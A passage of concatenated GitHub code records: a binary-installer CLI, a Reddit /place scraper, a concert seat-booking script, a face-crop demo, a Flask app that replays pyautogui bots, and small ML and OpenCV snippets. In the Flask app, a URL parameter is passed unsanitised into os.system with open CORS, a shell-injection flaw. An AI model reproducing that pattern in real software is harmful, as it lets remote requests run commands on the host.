PurePath\nfrom typing import Union\n\nimport click\nimport logzero\nfrom logzero import logger\n\nDEFAULT_BIN_PATH = Path(\"/usr/local/bin\")\nDEFAULT_CONFIG_PATH = Path.cwd() / \"packages.json\"\n#\n# `SYSTEM` and `MACHINE` are used for replacing templated strings in the config file, namely\n# the `url` and `file_to_extract` fields. `SYSTEM` should resolve to 'linux' or 'darwin', and\n# `MACHINE` is normally 'x86_64' (this may change with new Apple hardware eventually). But most\n# download links use 'amd64' instead of 'x86_64', so this replacement is done here.\n#\nSYSTEM = os.uname().sysname.lower()\nMACHINE = os.uname().machine.lower().replace(\"x86_64\", \"amd64\")\n\n\ndef configure_logging(verbosity: str) -> None:\n \"\"\"Configures logzero verbosity.\"\"\"\n\n logging_levels = {\n \"quiet\": {\"output\": logzero.NOTSET, \"format\": \"\"},\n \"normal\": {\"output\": logzero.INFO, \"format\": \"%(color)s%(message)s%(end_color)s\"},\n \"verbose\": {\"output\": logzero.DEBUG, \"format\": \"%(color)s%(message)s%(end_color)s\"},\n \"debug\": {\n \"output\": logzero.DEBUG,\n \"format\": (\n \"[%(levelname)8s %(asctime)s %(funcName)s:%(lineno)d] \"\n \"%(color)s%(message)s%(end_color)s\"\n ),\n },\n }\n\n logzero.loglevel(logging_levels[verbosity][\"output\"])\n logzero.formatter(formatter=logzero.LogFormatter(fmt=logging_levels[verbosity][\"format\"]))\n\n\n@click.command()\n@click.option(\n \"-b\",\n \"--bin-path\",\n default=DEFAULT_BIN_PATH,\n type=click.Path(exists=True),\n help=f\"Full path to binary install location (default: {DEFAULT_BIN_PATH}).\",\n)\n@click.option(\n \"-c\",\n \"--config\",\n default=DEFAULT_CONFIG_PATH,\n type=click.Path(exists=True),\n help=f\"Full path to config file (default: {DEFAULT_CONFIG_PATH}).\",\n)\n@click.option(\n \"-p\",\n \"--package\",\n type=str,\n multiple=True,\n help=\"Specific package(s), defined in config file, to install.\",\n)\n@click.option(\n \"-g\",\n \"--group\",\n type=str,\n multiple=True,\n help=\"Specific group(s) of packages, defined in config file, to install.\",\n)\n@click.option(\n \"-o\",\n \"--output\",\n default=\"normal\",\n type=click.Choice([\"quiet\", \"normal\", \"verbose\", \"debug\"], case_sensitive=False),\n help=\"Set script output type (default: normal).\",\n)\ndef infrastaller(bin_path: str, config: str, package: tuple, group: tuple, output: str) -> None:\n \"\"\"Downloads and installs binaries.\n\n \\b\n Install all packages to default location:\n $ 
python3 infrastaller.py\n\n \\b\n Install packages to a custom location:\n $ python3 infrastaller.py --bin-path /root/bin\n\n \\b\n Read config from a custom location:\n $ python3 infrastaller.py --config /etc/my_packages.json\n\n \\b\n Install specific packages from config file:\n $ python3 infrastaller.py --package binary2 --package binary3\n\n \\b\n Install a group of packages and an individual package:\n $ python3 infrastaller.py --group my-packages --package binary2\n\n \\b\n Enable verbose output:\n $ python3 infrastaller.py --output verbose\n \"\"\"\n\n configure_logging(output)\n\n with open(config, \"rb\") as json_config:\n logger.debug(\"Reading config file %s\", config)\n packages_data = json.loads(json_config.read())\n\n for pkg_group, binaries in packages_data.items():\n for binary, appinfo in binaries.items():\n #\n # Package should be installed if:\n # - neither 'package' nor 'group' flags are set (i.e. install everything)\n # - passed by 'package' flag (user specified a package)\n # - the package is part of a group passed by 'group' flag (user specified a group)\n #\n if (package or group) and (binary in package or pkg_group in group):\n install_binary(Path(bin_path), binary, appinfo)\n\n logger.info(\"Installation complete\")\n\n\ndef install_binary(install_path: Path, binary_name: str, package_data: dict) -> None:\n \"\"\"Parses package metadata and wraps all installation steps.\n\n Args:\n install_path: The full path to the install directory.\n binary_name: Filename to give the binary in the install_path.\n package_data: Package metadata from the JSON config file.\n \"\"\"\n\n logger.info(\"Installing %s...\", binary_name)\n\n #\n # The `url` field can be a string or dictionary depending on if the link is template-able.\n # See the README for more information.\n #\n if isinstance(package_data[\"url\"], Mapping):\n url = replace_placeholder_in_string(package_data[\"url\"][SYSTEM], package_data[\"version\"])\n else:\n url = replace_placeholder_in_string(package_data[\"url\"], package_data[\"version\"])\n\n download_dir = Path(tempfile.mkdtemp())\n downloaded_file = download(url, download_dir)\n\n if \"extract\" in package_data:\n binary_to_install = extract(\n package_data[\"extract\"][\"type_of_archive\"],\n replace_placeholder_in_string(\n package_data[\"extract\"][\"file_to_extract\"], package_data[\"version\"]\n ),\n downloaded_file,\n )\n else:\n binary_to_install = downloaded_file\n\n binary_full_path = PurePath.joinpath(install_path, binary_name)\n move_bin(binary_to_install, binary_full_path)\n chmod_exec(binary_full_path)\n\n logger.info(\"Installed %s to %s\", binary_name, binary_full_path)\n\n if Path.is_dir(download_dir):\n logger.debug(\"Removing %s\", download_dir)\n shutil.rmtree(download_dir)\n\n\ndef download(source: str, save_path: Path) -> str:\n \"\"\"Download the package from a URL source.\"\"\"\n destination = PurePath.joinpath(save_path, os.path.basename(source))\n logger.debug(\"Downloading from %s\", source)\n logger.debug(\"Saving download to %s\", destination)\n with urllib.request.urlopen(source) as response, open(destination, \"wb\") as output:\n output.write(response.read())\n return destination\n\n\ndef extract(type_of_archive: str, file_to_extract: str, archive: Path) -> str:\n \"\"\"A wrapper method to extract tar.gz and zip archives.\n\n Args:\n type_of_archive: The file type of the archive (e.g. 
zip, targz).\n file_to_extract: The filename to extract from the archive.\n archive: The full path to the compressed file.\n \"\"\"\n\n logger.debug(\"Extracting %s\", archive)\n\n destination = archive.parent\n\n if type_of_archive == \"targz\":\n with tarfile.open(archive, \"r:gz\") as tar_file:\n tar_file.extract(file_to_extract, destination)\n elif type_of_archive == \"zip\":\n with zipfile.ZipFile(archive, \"r\") as zip_file:\n zip_file.extract(file_to_extract, destination)\n else:\n logger.error(\"Archive type %s not supported.\", type_of_archive)\n sys.exit(1)\n\n logger.debug(\"Extracted %s to %s\", file_to_extract, destination)\n return PurePath.joinpath(destination, file_to_extract)\n\n\ndef move_bin(source: Union[Path, str], destination: Union[Path, str]) -> None:\n \"\"\"Moves the binary to a location in the PATH.\"\"\"\n try:\n logger.debug(\"Moving %s to %s\", source, destination)\n shutil.move(source, destination)\n except OSError as error:\n logger.exception(error)\n sys.exit(1)\n\n\ndef chmod_exec(filename: Union[Path, str]) -> None:\n \"\"\"Makes a binary executable; unix 755 permissions.\"\"\"\n logger.debug(\"Making %s executable\", filename)\n os.chmod(filename, 0o0755) # Octal in Python needs the leading '0o'.\n\n\ndef replace_placeholder_in_string(string: str, version: str) -> str:\n \"\"\"Replaces instances of template variables with appropriate values.\"\"\"\n conversions = {\n \"{{ version }}\": version,\n \"{{ system }}\": SYSTEM,\n \"{{ machine }}\": MACHINE,\n }\n for placeholder, replacement in conversions.items():\n string = string.replace(placeholder, replacement)\n return string\n\n\nif __name__ == \"__main__\":\n # The following check is disabled because Click handles parameter values.\n # pylint: disable=no-value-for-parameter\n infrastaller()\n","repo_name":"bradleyfrank/notes-etc","sub_path":"scripts/Python/infrastaller.py","file_name":"infrastaller.py","file_ext":"py","file_size_in_byte":8622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70927295413","text":"#!/usr/bin/env python3\n\nimport re\nimport json\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom .version import USER_AGENT\n\nHEADERS = { \"User-Agent\": USER_AGENT }\nPLACE_URL = \"https://www.reddit.com/place?webview=true\"\n\nDICT_RE = re.compile(r'\\{.+\\}')\nWSURL_RE = re.compile(r'\"place_websocket_url\": *\"([^\"]+)\"')\n\n#\n# This is perhaps the most hacky part of the project.\n# Our goal is to get a URL that we can hook a WebSocket\n# up to, and the only way I've found to do this is to\n# load /place like a browser and parse the HTML.\n#\ndef get_websocket_url():\n r = requests.get(PLACE_URL, headers=HEADERS)\n\n try:\n # the compliant way\n dom = BeautifulSoup(r.text, \"html.parser\")\n element = dom.find(id='config')\n match = DICT_RE.search(element.text)\n obj = json.loads(match.group(0))\n return obj[\"place_websocket_url\"]\n\n except (json.JSONDecodeError, KeyError, TypeError, AttributeError) as e:\n # the hacky way\n match = WSURL_RE.search(r.text)\n if not match:\n return None\n else:\n return match.group(1)\n\n","repo_name":"bell345/saving-place","sub_path":"savingplace/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20511968621","text":"import json\nfrom json.decoder import JSONDecodeError\n\n\"\"\"\nThis example code creates a 2d list (2d matrix) that can store 
seating.\nThe matrix is populated with a since all seats are available\n\"\"\"\n\n# our test matrix has 20 rows and 26 columns\nimport re\n\n\nn_row = 20\nn_col = 26\nFRONT_ROW_PRICE = 80\nMIDDLE_ROW_PRICE = 50\nBACK_ROW_PRICE = 25\nMASK_FEE = 5\nREGEX = re.compile(r'([A-Za-z0-9]+[.-_])*[A-Za-z0-9]+@[A-Za-z0-9-]+(\\.[A-Z|a-z]{2,})+')\nalphaToNum = {'a':0, 'b':1, 'c':2, 'd':3, 'e':4, 'f':5, 'g':6, 'h':7,\n 'i':8, 'j':9, 'k':10, 'l':11, 'm':12, 'n':13, 'o':14,\n 'p':15, 'q':16, 'r':17, 's':18, 't':19, 'u':20, 'v':21,\n 'w':22, 'x':23, 'y':24, 'z':25}\n\n# available seat\navailable_seat = 'a'\nunavailable_seat = 'X'\n# create some available seating\nseating = []\n\ndef CreateSeating():\n for r in range(n_row):\n row = []\n for c in range(n_col):\n row.append(available_seat)\n seating.append(row)\n\ndef PrintSeating():\n # print available seating\n print('\\t' + \"a b c d e f g h i j k l m n o p q r s t u v w x y z\")\n for r in range(n_row):\n print(r, end=\"\\t\")\n for c in range(n_col):\n print(seating[r][c], end=\" \")\n print()\n\ndef SeatPricing():\n # print seating prices\n print()\n print(\"Front Rows price: $80, Rows 0-4\")\n print(\"Middle Rows price: $50, Rows 5-10\")\n print(\"Back Rows price: $25, Rows 11-19\")\n print()\n\ndef CheckRowSize(seat):\n if len(seat) == 3:\n row = int(seat[0:2])\n column = alphaToNum[seat[2]]\n else:\n row = int(seat[0])\n column = alphaToNum[seat[1]]\n return row, column\n\ndef CheckAvail(seat):\n row, column = CheckRowSize(seat)\n if row in [1, 3, 5, 7, 9, 11, 13, 15, 17, 19]:\n print(\"Sorry, all odd rows are unavailable due to COVID restrictions.\")\n return False\n elif seating[row][column] == 'X':\n print(\"Sorry, this seat is occupied.\")\n return False\n \n if column == 24:\n if seating[row][column+1] == 'X' or seating[row][column-1] == 'X' or seating[row][column-2] == 'X':\n print(\"Sorry, this seat is unavailable due to COVID restrictions.\")\n return False\n elif column == 25:\n if seating[row][column-1] == 'X' or seating[row][column-2] == 'X':\n print(\"Sorry, this seat is unavailable due to COVID restrictions.\")\n return False\n else:\n if seating[row][column+1] == 'X' or seating[row][column+2] == 'X' or seating[row][column-1] == 'X' or seating[row][column-2] == 'X':\n print(\"Sorry, this seat is unavailable due to COVID restrictions.\")\n return False\n\ndef BuyTickets(purchaseList):\n ticketCosts = 0\n for x in purchaseList:\n row, column = CheckRowSize(x)\n seating[row][column] = 'X'\n if (0 <= row <= 4):\n ticketCosts = ticketCosts + FRONT_ROW_PRICE\n elif (5 <= row <= 10):\n ticketCosts = ticketCosts + MIDDLE_ROW_PRICE\n elif (11 <= row <= 19):\n ticketCosts = ticketCosts + BACK_ROW_PRICE\n\n tax = 0.0725*ticketCosts \n totalCost = ticketCosts + tax + MASK_FEE\n print()\n print(\"------------------------\")\n print(\"--- PURCHASE SUMMARY ---\")\n print(\"------------------------\")\n print(f\"Subtotal = ${ticketCosts:.2f}\")\n print(f\"State Tax = ${tax:.2f}\")\n print(f\"Mask Fee = ${MASK_FEE:.2f}\")\n print(f\"Total Cost = ${totalCost:.2f}\")\n\n print()\n print()\n while True:\n userName = input(\"Please enter your name: \").lower()\n if not (userName == \"\"):\n break\n else:\n print(\"Error! Name cannot be blank.\")\n while True:\n userEmail = input(\"Please enter your email: \")\n if re.fullmatch(REGEX, userEmail):\n break\n else:\n print(\"Error! 
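CheckAvail above duplicates the two-seat distance test three times to avoid indexing past columns 24 and 25. A bounds-checked scan over the +/-2 neighbourhood removes the special cases; `neighbours_clear` is an illustrative helper, with `seating`, `n_col`, and the 'X' marker taken from the script above:

def neighbours_clear(seating, row, column, n_col=26, radius=2):
    # True when no occupied seat sits within `radius` columns of (row, column).
    for offset in range(-radius, radius + 1):
        c = column + offset
        if offset != 0 and 0 <= c < n_col and seating[row][c] == 'X':
            return False
    return True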
Please provide a valid email address.\")\n\n jsonData.append({\n \"name\": userName,\n \"numTickets\": len(purchaseList),\n \"seats\": purchaseList,\n \"email\": userEmail,\n \"totalCost\": totalCost\n })\n with open(\"SavedSeatPurchases.json\", 'w+') as json_file:\n json.dump(jsonData, json_file, indent = 4, separators=(',',': '))\n\n\nuserQuit = False\nCreateSeating()\nwith open(\"SavedSeatPurchases.json\", \"r+\") as myJson:\n try:\n jsonData = json.load(myJson)\n for customer in jsonData:\n for x in customer['seats']:\n row, column = CheckRowSize(x)\n seating[row][column] = 'X'\n except JSONDecodeError:\n jsonData=[]\n print(\"File was empty, creating an empty list\")\n\nwhile (not userQuit):\n # menu\n print()\n print(\"•••••••••••••••••••••••\")\n print(\"Welcome to the Concert!\")\n print(\"•••••••••••••••••••••••\")\n print()\n print(\"[B] buy a ticket\")\n print(\"[D] display all purchases\")\n print(\"[S] search by name\")\n print(\"[V] view available seating\")\n print(\"[Q] quit\")\n print()\n\n # get the user input\n userInput = input(\"Enter a command:\")\n lowerInput = userInput.lower()\n firstChar = lowerInput[0:1]\n\n # quit\n if firstChar == 'q':\n userQuit = True\n print()\n print(\"Thank you for purchasing tickets for the concert!!\")\n print()\n \n # buy a ticket\n elif firstChar == 'b':\n \"\"\"\n - provide receipt with state tax of 7.25%\n - additional mandatory mask fee of $5\n - when purchase is made ask for name and email address\n \"\"\"\n\n PrintSeating()\n SeatPricing()\n while True:\n numTickets = input(\"How many tickets would you like to buy? \")\n if not (numTickets == \"\"):\n numTickets = int(numTickets)\n break\n else:\n print(\"Error! Number of tickets you are buying cannot be blank.\")\n ticketList = []\n print()\n print(\"All odd rows are unavailable due to COVID restrictions.\")\n print(\"When you choose your seat make sure to enter row number and column letter.\")\n print(\"For example: row 2 column c would be 2c\")\n print()\n for x in range(numTickets):\n while True:\n seatChoice = input(f\"Pick seat #{x+1} (m to go to menu): \").lower()\n if (seatChoice == \"\"):\n print(\"Error! Seat choice cannot be blank.\")\n continue\n if seatChoice == 'm':\n break\n if CheckAvail(seatChoice) == False:\n continue\n else:\n ticketList.append(seatChoice)\n break\n if seatChoice == 'm':\n break\n \n if seatChoice != 'm':\n BuyTickets(ticketList)\n\n\n # display all purchases\n elif firstChar == 'd':\n \"\"\"\n - prints all purchases made\n - shows the total amount of money the venue has made\n \"\"\"\n venueMoney = 0\n for customerPurchase in jsonData:\n print(f\"Customer ({customerPurchase['name']}) purchased {customerPurchase['numTickets']} ticket(s). Total price paid was ${customerPurchase['totalCost']:.2f}.\")\n venueMoney = venueMoney + customerPurchase['totalCost']\n print()\n print(f\"The total money the venue has made is ${venueMoney}\")\n\n \n # search by name\n elif firstChar == 's':\n \"\"\"\n - displays tickets purchased by user with specific name\n \"\"\"\n lookupUser = input(\"Please enter customers name to lookup tickets purchased: \").lower()\n for customer in jsonData:\n if lookupUser == customer['name']:\n print()\n print(f\"Customer ({lookupUser}) purchased {customer['numTickets']} ticket(s). Seat(s) are {customer['seats']}.\")\n break\n else:\n print()\n print(\"Error! 
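One detail in the REGEX above: inside a character class, [.-_] is a range from '.' (0x2E) to '_' (0x5F), so it also accepts digits, ';', '<', '@' and similar characters in the local part, and [A-Z|a-z] likewise admits a literal '|'. Moving '-' to the end of the class makes it literal. A sketch of the tightened pattern:

import re

EMAIL_RE = re.compile(r'([A-Za-z0-9]+[._-])*[A-Za-z0-9]+@[A-Za-z0-9-]+(\.[A-Za-z]{2,})+')

assert EMAIL_RE.fullmatch('jane.doe@example.com')
assert EMAIL_RE.fullmatch('a;b@example.com') is None  # ';' no longer slips through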
Customer not found.\")\n\n # view available seating\n elif firstChar == 'v':\n \"\"\"\n - available seats are indicated with a lower case a\n - occupied seats are indicated with a capital X\n - 2 social distancing seats between each occupied seat on a row\n - 1 row distance between each row\n - bulk tickets can sit next to each other\n - 3 types of seating\n - front seat price $80\n - rows 0 - 4\n middle seat price $50\n - rows 5 - 10\n - back seat price $ 25\n - rows 11 - 19\n \"\"\"\n PrintSeating()","repo_name":"Avneet2026/Outdoor-Park-Concert-App","sub_path":"Concert-App.py","file_name":"Concert-App.py","file_ext":"py","file_size_in_byte":8612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71763950134","text":"import face_recognition\nfrom PIL import Image\n\n# load image name\nimage = face_recognition.load_image_file(\"images/1.jpg\")\n\n# recognise faces and their locations (coordinates)\nface_locations = face_recognition.face_locations(image)\n\nprint(face_locations)\nprint(type(face_locations))\nprint(\"Faces found \", len(face_locations))\n\n'''\nTo crop your image, you need top-left and right-bottom coordinates (top, left, right, bottom)\nour face locations is organized differently (top, right, bottom, left)\n'''\nfor face_location in face_locations:\n # get the coordinates of the image\n top, right, bottom, left = face_location\n\n # Extract the region of the image that contains the face\n face_image = image[top:bottom, left:right]\n img = Image.fromarray(face_image)\n img.show()\n\n","repo_name":"Brian1011/facial_recognition_test","sub_path":"facial.py","file_name":"facial.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43325333991","text":"# Library imports\n# import pyHook\n# from pyHook.HookManager import HookConstants\n# import pythoncom\nimport pyautogui\nimport time\nimport os\nimport json\nfrom flask import Flask, request, jsonify\nfrom flask_cors import CORS\n\n# Initialise flask app\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello World!'\n\n\n@app.route('/record/')\ndef record(bot_name):\n # # Called when mouse events are received\n # def on_mouse_event(event):\n # # Check for all events except 'mouse move'\n # if event.MessageName != 'mouse move':\n # # Check button\n # if 'right' in event.MessageName:\n # button = 'right'\n # if 'left' in event.MessageName:\n # button = 'left'\n #\n # # Check direction\n # if 'down' in event.MessageName:\n # direction = 'down'\n # if 'up' in event.MessageName:\n # direction = 'up'\n #\n # # Append event to sequence\n # event_sequence.append({\n # 'type': 'mouse',\n # 'button': button,\n # 'direction': direction,\n # 'time': event.Time,\n # 'window': event.Window,\n # 'windowName': event.WindowName,\n # 'position': event.Position\n # })\n #\n # # return True to pass the event to other handlers\n # return True\n #\n # # Called when keyboard events are received\n # def on_keyboard_event(event):\n # # Clean up when escape is pressed\n # if event.Key == 'Escape':\n # # Load existing bot from given file\n # with open(bot_file_path) as bot_file:\n # bot = json.load(bot_file)\n #\n # # Merge newly created event_sequence with existing one\n # bot['events'] += event_sequence\n #\n # # Open bot_file in write mode\n # with open(bot_file_path, 'w') as bot_file:\n # # Replace current bot in bot_file with new bot\n # json.dump(bot, 
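face_recognition returns boxes as (top, right, bottom, left), while PIL's Image.crop expects (left, upper, right, lower); the NumPy slice above sidesteps that, but the reordering is worth making explicit when cropping with PIL directly. A short sketch; `crop_face` is an illustrative name:

from PIL import Image

def crop_face(pil_image: Image.Image, face_location) -> Image.Image:
    top, right, bottom, left = face_location           # face_recognition order
    return pil_image.crop((left, top, right, bottom))  # PIL order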
bot_file, indent=2)\n #\n # # Exit script\n # exit(0)\n #\n # # If ctrl pressed\n # if pyHook.GetKeyState(HookConstants.VKeyToID('VK_CONTROL')):\n # # If prev was ctrl as well\n # if event_sequence and event_sequence[-1]['type'] == 'keyboard' and \\\n # event_sequence[-1]['key'] == 'ctrlleft':\n # # If not this key is ctrl\n # if not (event.Key == 'Lcontrol' or event.Key == 'Rcontrol'):\n # # Append to prev entry's nextKeys list\n # event_sequence[-1]['nextKeys'].append(event.Key.lower())\n # else:\n # # Store this event with key as ctrl and nextKey as this key\n # event_sequence.append({\n # 'type': 'keyboard',\n # 'messageName': event.MessageName,\n # 'time': event.Time,\n # 'window': event.Window,\n # 'windowName': event.WindowName,\n # 'ascii': event.Ascii,\n # 'key': 'ctrlleft',\n # 'nextKeys': []\n # })\n # # Elif shift pressed\n # elif pyHook.GetKeyState(HookConstants.VKeyToID('VK_SHIFT')):\n # # If prev was shift as well\n # if event_sequence and event_sequence[-1]['type'] == 'keyboard' and \\\n # event_sequence[-1]['key'] == 'shiftleft':\n # # If not this key is shift\n # if not (event.Key == 'Lshift' or event.Key == 'Rshift'):\n # # Append to prev entry's nextKeys list\n # event_sequence[-1]['nextKeys'].append(event.Key.lower())\n # else:\n # # Store this event with key as shift and nextKey as this key\n # event_sequence.append({\n # 'type': 'keyboard',\n # 'messageName': event.MessageName,\n # 'time': event.Time,\n # 'window': event.Window,\n # 'windowName': event.WindowName,\n # 'ascii': event.Ascii,\n # 'key': 'shiftleft',\n # 'nextKeys': []\n # })\n # # For non ctrl/shift long-press situations\n # else:\n # # Handle special keys\n # event_sequence.append(handle_special_keys(event))\n #\n # # Return True to pass the event to other handlers\n # return True\n #\n # # Convert special key inputs from pyhook to pyautogui nomenclature\n # def handle_special_keys(event):\n # # If not a capital letter\n # if int(event.Ascii) < 65 or int(event.Ascii) > 90:\n # # Make all characters lowercase (handles mose cases)\n # key = event.Key.lower()\n # else:\n # key = event.Key\n #\n # # Define pyhook-pyautogui dict\n # conversion_dict = {\n # 'lshift': 'shiftleft',\n # 'rshift': 'shiftleft',\n # 'lcontrol': 'ctrlleft',\n # 'rcontrol': 'ctrlleft',\n # 'lmenu': 'altleft',\n # 'rmenu': 'altleft',\n # 'back': 'backspace',\n # 'prior': 'pageup',\n # 'next': 'pagedown',\n # 'volume_up': 'volumeup',\n # 'volume_down': 'volumedown',\n # 'volume_mute': 'volumemute',\n # 'capital': 'capslock',\n # 'lwin': 'winleft',\n # 'rwin': 'winleft'\n # }\n #\n # # Replace special keys with pyautogui equivalent\n # if key in conversion_dict:\n # key = conversion_dict[key]\n #\n # # Final event to return\n # final_event = {\n # 'type': 'keyboard',\n # 'messageName': event.MessageName,\n # 'time': event.Time,\n # 'window': event.Window,\n # 'windowName': event.WindowName,\n # 'ascii': event.Ascii,\n # 'key': key\n # }\n #\n # # If key is ctrl/shift, include nextKeys attribute\n # if key == 'shiftleft' or key == 'ctrlleft':\n # final_event['nextKeys'] = []\n #\n # return final_event\n #\n # # Get bot_file_path given bot_name\n # bot_file_path = os.path.join(os.getcwd(), bot_name + '.json')\n #\n # # Initialise global list of events\n # event_sequence = []\n #\n # # Create a hook manager\n # hm = pyHook.HookManager()\n #\n # # Watch for all mouse and keyboard events\n # hm.MouseAll = on_mouse_event\n # hm.KeyDown = on_keyboard_event\n #\n # # Set the hooks\n # hm.HookMouse()\n # hm.HookKeyboard()\n #\n # # Wait forever 
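The commented-out conversion_dict above maps pyHook key names onto pyautogui names and then branches on membership. dict.get() with the lowercased name as its own default collapses that to a single lookup; the table entries below are exactly the ones listed in the snippet:

PYHOOK_TO_PYAUTOGUI = {
    'lshift': 'shiftleft', 'rshift': 'shiftleft',
    'lcontrol': 'ctrlleft', 'rcontrol': 'ctrlleft',
    'lmenu': 'altleft', 'rmenu': 'altleft',
    'back': 'backspace', 'prior': 'pageup', 'next': 'pagedown',
    'volume_up': 'volumeup', 'volume_down': 'volumedown', 'volume_mute': 'volumemute',
    'capital': 'capslock', 'lwin': 'winleft', 'rwin': 'winleft',
}

def to_pyautogui_key(pyhook_name: str) -> str:
    name = pyhook_name.lower()
    return PYHOOK_TO_PYAUTOGUI.get(name, name)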
(using windows message loop)\n # pythoncom.PumpMessages()\n\n os.system('python recorder.py ' + bot_name)\n\n # Exit route\n return 'success'\n\n\n@app.route('/play/')\ndef play(bot_name):\n # Execute one mouse event\n def execute_mouse_event(event):\n # If down direction\n if event['direction'] == 'down':\n pyautogui.mouseDown(button=event['button'], x=event['position'][0], y=event['position'][1])\n\n # If up direction\n if event['direction'] == 'up':\n pyautogui.mouseUp(button=event['button'], x=event['position'][0], y=event['position'][1])\n # Pause python\n time.sleep(2)\n\n # Execute one mouse event\n def execute_keyboard_event(event):\n # If ctrl/shift\n if event['key'] == 'shiftleft' or event['key'] == 'ctrlleft':\n # Press special key\n pyautogui.keyDown(event['key'])\n\n # Loop through nextKeys\n for next_key in event['nextKeys']:\n pyautogui.press(next_key)\n\n # For any other key, just press\n pyautogui.press(event['key'])\n\n # Get bot_file_path from electron\n bot_file_path = os.path.join(os.getcwd(), bot_name + '.json')\n\n # Load bot (passed in as argument by electron)\n with open(bot_file_path) as bot_file:\n bot = json.load(bot_file)\n\n # Execute bot\n for event in bot['events']:\n # For mouse events\n if event['type'] == 'mouse':\n execute_mouse_event(event)\n\n # For keyboard events\n if event['type'] == 'keyboard':\n execute_keyboard_event(event)\n\n # Exit route\n return 'success'\n\n\n@app.route('/load-steps/')\ndef load_steps(bot_name):\n # Get bot_file_path from electron\n bot_file_path = os.path.join(os.getcwd(), bot_name + '.json')\n\n with open(bot_file_path) as bot_file:\n bot = json.load(bot_file)\n return jsonify(bot)\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"shreyasparbat/autobot","sub_path":"src/pyAutomation/flask-app.py","file_name":"flask-app.py","file_ext":"py","file_size_in_byte":8742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28525077725","text":"count1 = 0\ncount3 = 0\n\ndef count_diff(val1, val2):\n global count1\n global count3\n diff = val2 - val1\n \n if diff == 3:\n count3 += 1\n elif diff == 1:\n count1 += 1\n\ndata = sorted([int(x.strip()) for x in open(\"10/input.txt\")] + [0])\n\nfor i in range(len(data) - 1): \n count_diff(data[i], data[i + 1])\n\n# add final diff of 3 jolts to device\ncount3 += 1\n \nprint(count1 * count3)\n","repo_name":"bcwood/adventofcode2020","sub_path":"10/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15979716746","text":"from setuptools import find_packages, setup\nfrom typing import List\n\n########libraries / package installations#########\n# pip install -r requirements.txt\n\nHYPEN_E_DOT='-e .'\ndef get_requirements(file_path:str)->List[str]:\n '''\n this function returns the list of requirements\n '''\n requirements=[]\n with open(file_path) as file_obj:\n requirements=file_obj.readlines() #read the lines from file\n requirements=[req.replace(\"\\n\", \"\") for req in requirements]\n\n if HYPEN_E_DOT in requirements:\n requirements.remove(HYPEN_E_DOT)\n return requirements\n\nsetup(\n name ='mlproject',\n version = '0.0.1',\n author='bryan keane',\n author_email='bryankeane09@gmail.com',\n packages=find_packages(),\n 
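Two quirks in the play route above: execute_keyboard_event holds a modifier with pyautogui.keyDown() but never calls keyUp(), and the trailing pyautogui.press(event['key']) runs even after the modifier branch, so shift/ctrl get pressed a second time. A sketch of the apparent intent using pyautogui.hold(), the context manager available in recent pyautogui releases (assumption: nextKeys is only present on modifier events, as the recorder comments suggest):

import pyautogui

def execute_keyboard_event(event: dict) -> None:
    if event['key'] in ('shiftleft', 'ctrlleft'):
        with pyautogui.hold(event['key']):  # modifier is released on exit
            for next_key in event['nextKeys']:
                pyautogui.press(next_key)
    else:
        pyautogui.press(event['key'])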
install_requires=get_requirements('requirements.txt')\n)","repo_name":"bryank09/test-score-prediction","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28177731560","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 15 21:17:42 2017\n\n@author: Brilian\n\"\"\"\nimport numpy as np\n#plot softmax curves\nimport matplotlib.pyplot as plt\n\ndef softmax(x):\n expx = np.exp(x)\n return expx / expx.sum(axis=0) \n \nif __name__ == \"__main__\":\n scores = np.array([3.0, 1.0, 0.2]) \n print (softmax(scores))\n print (softmax(scores*10)) #the scores will be either near 1 or near 0\n print (softmax(scores/10)) #the scores will be in uniform distribution\n \n X = np.arange(-2.0, 6.0, 0.1)\n Xone = np.ones_like(X)\n scores = np.vstack([X, Xone, 0.2*Xone])\n \n plt.plot(X, softmax(scores).T, linewidth=2)\n plt.show()\n \n \n \n \n \n \n\n","repo_name":"briliantnugraha/Deep-learning-tensorflow-udacity","sub_path":"1.softmax.py","file_name":"1.softmax.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7810662961","text":"import numpy as np\nimport cv2\n\nclass ImageDecorator(object):\n\n def __init__(self):\n pass\n\n def fit(self):\n return\n\n def transform(self, _img, _lane_lines, _curvature):\n return np.copy(_img)\n\ndef trapezoid(img, src):\n src = np.int32(src)\n img = np.copy(img)\n src = src.reshape((-1,1,2))\n img = cv2.polylines(img, [src],True,(0,255,255), 5)\n return img\n\ndef weighted_img(img, initial_img, α=0.8, β=1., γ=0.):\n \"\"\"\n `img` is the output of the hough_lines(), An image with lines drawn on it.\n Should be a blank image (all black) with lines drawn on it.\n \n `initial_img` should be the image before any processing.\n \n The result image is computed as follows:\n \n initial_img * α + img * β + γ\n NOTE: initial_img and img must be the same shape!\n \"\"\"\n return cv2.addWeighted(initial_img, α, img, β, γ)\n\ndef image_in_image(original_image, img_array):\n\n output_image = np.copy(original_image)\n h, w = original_image.shape[0:2]\n margin = 50\n\n for pic_indx, pic in enumerate(img_array):\n resized = cv2.resize(pic, (int(w*0.3), int(h*0.3)), interpolation = cv2.INTER_AREA)\n r_h, r_w = resized.shape[0:2]\n \n # Scale up binary thresholded images\n if np.max(resized) == 1:\n resized = resized * 255\n\n # Add color channels to one channel images\n if len(resized.shape) == 2:\n 